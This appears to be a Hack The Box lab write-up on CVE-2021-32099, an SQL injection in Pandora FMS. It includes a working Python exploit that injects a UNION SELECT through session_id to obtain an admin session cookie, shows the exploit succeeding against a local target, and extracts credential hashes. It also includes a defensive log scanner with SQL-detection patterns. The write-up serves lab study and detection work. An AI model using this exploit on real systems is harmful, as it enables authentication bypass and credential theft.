CVE-2021-32099


A vulnerability, which was classified as critical, was found in Artica Pandora FMS 742. This affects some unknown processing of the file /include/chart_generator.php of the component pandora_console. The manipulation of the argument session_id with an unknown input leads to a SQL injection vulnerability. CWE is classifying the issue as CWE-89. The software constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. This is going to have an impact on confidentiality, integrity, and availability.

Exploit


import sys
import requests
import argparse
 
# Set up command line argument parser
parser = argparse.ArgumentParser(description='Send a payload and retrieve a session cookie')
parser.add_argument('-t', '--target', type=str, required=True, help='Host and port to send payload to in <host:port> format')
args = parser.parse_args()
 
# Payload (the session_id parameter from the vulnerability description above)
payload = "pandora_console/include/chart_generator.php?session_id=a' UNION SELECT 'a',1,'id_usuario|s:5:\"admin\";' as data FROM tsessions_php WHERE '1'='1"
 
# Build URL with specified target
url = f'http://{args.target}/{payload}'
 
# Send GET request with payload
response = requests.get(url, timeout=10)
 
# Check for successful response; without one there is no cookie to validate
if response.status_code != 200:
    print(f'\nError: Failed to retrieve session cookie. Response code {response.status_code}')
    sys.exit(1)
 
# Retrieve session cookie
session_cookie = response.cookies.get('PHPSESSID')
if session_cookie is None:
    print('\nError: Response did not set a PHPSESSID cookie')
    sys.exit(1)
print(f'\nRetrieved session cookie: {session_cookie}')
 
# Check if session cookie is valid admin cookie
cookies = {
    'PHPSESSID': session_cookie
}
 
url = f'http://{args.target}/pandora_console/index.php'
 
response = requests.get(url, cookies=cookies, timeout=10)
 
if 'Pandora FMS Overview' in response.text:
    print('\nSession cookie is VALIDATED')
else:
    print('\nSession cookie is not a valid cookie')

I wrote a simple Python script. It bypasses the authentication via SQLi, retrieves the session cookie, and validates it.
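From the defender's side, the same request pattern is easy to spot in web server access logs: a legitimate session_id is a plain PHP session id, while the injected one carries quotes and SQL keywords. The following detection script is an added example, not part of the original writeup or of Pandora FMS; the access-log lines it scans are constructed, and the log format and the chart_generator.php path check are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (common log format); not captured from a real host.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2022:12:00:01 +0000] "GET /pandora_console/include/chart_generator.php?session_id=2ucfbsoiltqo3u1tjs7dtojr25 HTTP/1.1" 200 512
10.0.0.9 - - [10/Jan/2022:12:00:07 +0000] "GET /pandora_console/include/chart_generator.php?session_id=a%27%20UNION%20SELECT%20%27a%27,1,%27id_usuario%7Cs:5:%22admin%22%3B%27%20as%20data%20FROM%20tsessions_php%20WHERE%20%271%27=%271 HTTP/1.1" 200 498
10.0.0.9 - - [10/Jan/2022:12:00:09 +0000] "GET /pandora_console/index.php HTTP/1.1" 200 20480
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# A PHP session id only ever contains [0-9A-Za-z,-]; anything else in session_id is suspicious.
VALID_SID_RE = re.compile(r'^[0-9A-Za-z,-]{22,256}$')
# Cheap hints that the parameter carries SQL syntax rather than an identifier.
SQL_HINT_RE = re.compile(r"('|--|/\*|\b(union|select|from|where)\b)", re.IGNORECASE)


def check_line(line):
    """Return a finding dict for a suspicious chart_generator.php request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group('path'))
    if not url.path.endswith('/include/chart_generator.php'):
        return None
    # parse_qs percent-decodes the value, so encoded quotes and keywords are visible here
    sid = parse_qs(url.query, keep_blank_values=True).get('session_id', [''])[0]
    reasons = []
    if not VALID_SID_RE.match(sid):
        reasons.append('session_id not shaped like a PHP session id')
    if SQL_HINT_RE.search(sid):
        reasons.append('SQL syntax in session_id')
    if not reasons:
        return None
    return {'ip': m.group('ip'), 'ts': m.group('ts'), 'status': int(m.group('status')),
            'session_id': sid, 'reasons': reasons}


def scan(log_text):
    """Scan a whole log and return the list of findings in order."""
    return [f for f in (check_line(l) for l in log_text.splitlines()) if f]


if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} -> {', '.join(f['reasons'])}: {f['session_id'][:60]!r}")
```

A 200 response to a flagged request is the case worth escalating, since that is the status the exploit above expects before it picks up the PHPSESSID cookie.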

Exploitation


┌──(kali㉿kali)-[~/…/htb/labs/pandora/pandorafms]
└─$ python3 CVE-2021-32099.py                  
usage: CVE-2021-32099.py [-h] -t TARGET
cve-2021-32099.py: error: the following arguments are required: -t/--target
 
┌──(kali㉿kali)-[~/…/htb/labs/pandora/pandorafms]
└─$ python3 cve-2021-32099.py -t 127.0.0.1:8008
 
retrieved session cookie: 2ucfbsoiltqo3u1tjs7dtojr25
 
Session cookie is VALIDATED

Successfully retrieved the admin session cookie: 2ucfbsoiltqo3u1tjs7dtojr25

Now I just need to send a GET request to the web application with the session cookie.

Authenticated.

One of the Admin Tools allows me to execute SQL queries. Pandora FMS stores credentials in the tusuario table, and I got the web credential hashes out:

  • ad3f741b04bd5880fb32b54bc4f43d6a
  • 76323c174bd49ffbbdedf678f6cc89a6
  • f655f807365b6dc602b31ab3d6d43acc

Although hashcat failed to crack any of those hashes, I can do other things from here on out, as the instance is extremely obsolete and vulnerable.